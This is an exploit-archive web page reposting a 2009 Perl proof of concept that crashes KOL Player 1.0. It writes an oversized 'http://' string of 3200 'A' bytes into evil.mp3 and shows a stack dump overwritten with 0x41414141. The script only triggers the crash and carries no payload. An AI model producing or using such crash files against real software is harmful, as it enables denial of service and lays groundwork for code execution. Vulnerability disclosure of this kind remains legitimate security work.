首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
KOL Player 1.0 (.mp3 File) Local Buffer Overflow PoC
来源:www.vfocus.net 作者:vfocus 发布时间:2009-08-19  
#!/usr/bin/perl
# KOL Player 1.0 (.mp3) Local Buffer Overflow PoC
# http://thaddy.co.uk/kolacmwaveplayer.zip
########################################################################################
# 0012F920  |00168370  ASCII "AAAA"
# 0012F924  |41410004
# 0012F928  |41414141
# 0012F92C  |41414141
# 0012F930  |41414141
# 0012F934  |41414141
# 0012F938  |41414141
# 0012F93C  |41414141
# 0012F940  |41414141
# 0012F944  |41414141
# 0012F948  |41414141
########################################################################################
my $crash="http://"."\x41" x 3200;
open(myfile,'>>evil.mp3');
print myfile $crash;
########################################################################################
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Playlistmaker 1.51 (.m3u File)
·ProSysInfo TFTP Server TFTPDWI
·Joomla Component MisterEstate
·Traidnt UP 2.0 Remote SQL Inje
·Xenorate Media Player 2.6.0.0
·VUPlayer <= 2.49 (.m3u File) U
·broid 1.0 Beta 3a (.mp3 File)
·Linux Kernel 2.x sock_sendpage
·MS Internet Explorer (Javascri
·Arcadem Pro 2.8 (article) Blin
·TheGreenBow VPN Client tgbvpn.
·SPIP < 2.0.9 Arbitrary Copy Al
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved